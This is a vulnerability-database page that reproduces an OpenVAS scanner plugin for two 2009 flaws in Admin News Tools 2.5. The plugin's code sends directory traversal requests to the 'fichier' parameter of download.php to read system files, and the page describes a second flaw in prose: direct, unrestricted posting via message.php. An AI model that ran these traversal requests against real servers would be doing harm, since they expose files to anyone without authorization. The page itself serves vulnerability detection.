Admin News Tools Multiple Vulnerabilities
🗓️ 31 Jul 2009 00:00:00Reported by Copyright (C) 2009 Greenbone AGType
openvas🔗 plugins.openvas.org👁 20 Views
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| CVE-2009-2557 | 15 Jul 200900:00 | – | circl | |
| CVE-2009-2558 | 15 Jul 200900:00 | – | circl | |
| CVE-2009-2557 | 21 Jul 200917:00 | – | cve | |
| CVE-2009-2558 | 21 Jul 200917:00 | – | cve | |
| CVE-2009-2557 | 21 Jul 200917:00 | – | cvelist | |
| CVE-2009-2558 | 21 Jul 200917:00 | – | cvelist | |
| Admin News Tools 2.5 - 'fichier' Remote File Disclosure | 15 Jul 200900:00 | – | exploitdb | |
| Admin News Tools - Remote Contents Change | 15 Jul 200900:00 | – | exploitdb | |
| EUVD-2009-2552 | 7 Oct 202500:30 | – | euvd | |
| EUVD-2009-2553 | 7 Oct 202500:30 | – | euvd |
10
| Source | Link |
|---|---|
| milw0rm | www.milw0rm.com/exploits/9153 |
| xforce | www.xforce.iss.net/xforce/xfdb/51780 |
| secunia | www.secunia.com/advisories/35842 |
| milw0rm | www.milw0rm.com/exploits/9161 |
# SPDX-FileCopyrightText: 2009 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
CPE = "cpe:/a:adminnewstools:admin_news_tools";
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.900905");
script_version("2025-04-15T05:54:49+0000");
script_tag(name:"last_modification", value:"2025-04-15 05:54:49 +0000 (Tue, 15 Apr 2025)");
script_tag(name:"creation_date", value:"2009-07-31 07:37:13 +0200 (Fri, 31 Jul 2009)");
script_tag(name:"cvss_base", value:"7.5");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_cve_id("CVE-2009-2557", "CVE-2009-2558");
script_name("Admin News Tools Multiple Vulnerabilities");
script_category(ACT_ATTACK);
script_copyright("Copyright (C) 2009 Greenbone AG");
script_family("Web application abuses");
script_dependencies("secpod_admin_news_tools_detect.nasl", "os_detection.nasl");
script_mandatory_keys("ANT/installed");
script_require_ports("Services/www", 80);
script_tag(name:"impact", value:"Successful exploitation will allow remote attackers to bypass security
restrictions by gaining sensitive information and redirect the user to other malicious sites.");
script_tag(name:"affected", value:"Admin News Tools version 2.5.");
script_tag(name:"insight", value:"- Input passed via the 'fichier' parameter in 'system/download.php' is not
properly verified before being processed and can be used to read arbitrary files via a .. (dot dot) sequence.
- Access to system/message.php is not restricted properly and can be
exploited to post news messages by accessing the script directly.");
script_tag(name:"solution", value:"Upgrade to Admin News Tools version 3.0 or later.");
script_tag(name:"summary", value:"Admin News Tools is prone to multiple vulnerabilities.");
script_xref(name:"URL", value:"http://secunia.com/advisories/35842");
script_xref(name:"URL", value:"http://www.milw0rm.com/exploits/9161");
script_xref(name:"URL", value:"http://www.milw0rm.com/exploits/9153");
script_xref(name:"URL", value:"http://xforce.iss.net/xforce/xfdb/51780");
script_tag(name:"qod_type", value:"remote_app");
script_tag(name:"solution_type", value:"VendorFix");
exit(0);
}
include("misc_func.inc");
include("traversal_func.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("host_details.inc");
include("os_func.inc");
if( ! port = get_app_port( cpe:CPE ) )
exit( 0 );
if( ! dir = get_app_location( cpe:CPE, port:port ) )
exit( 0 );
if( dir == "/" )
dir = "";
if( os_host_runs("windows") == "yes" ) {
files = traversal_files( "windows" );
foreach file( keys( files ) ) {
url = dir + "/news/system/download.php?fichier=./../../../../../" + files[file];
if( http_vuln_check( port:port, url:url, pattern:file ) ) {
report = http_report_vuln_url( port:port, url:url );
security_message( port:port, data:report );
exit( 0 );
}
}
} else {
files = traversal_files( "linux" );
foreach file( keys( files ) ) {
url = dir + "/news/system/download.php?fichier=../../../../../../" + files[file];
if( http_vuln_check( port:port, url:url, pattern:file ) ) {
report = http_report_vuln_url( port:port, url:url );
security_message( port:port, data:report );
exit( 0 );
}
}
}
exit( 99 );
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Apr 2025 00:00Current
6.6Medium risk
Vulners AI Score6.6
CVSS 27.5
EPSS0.06785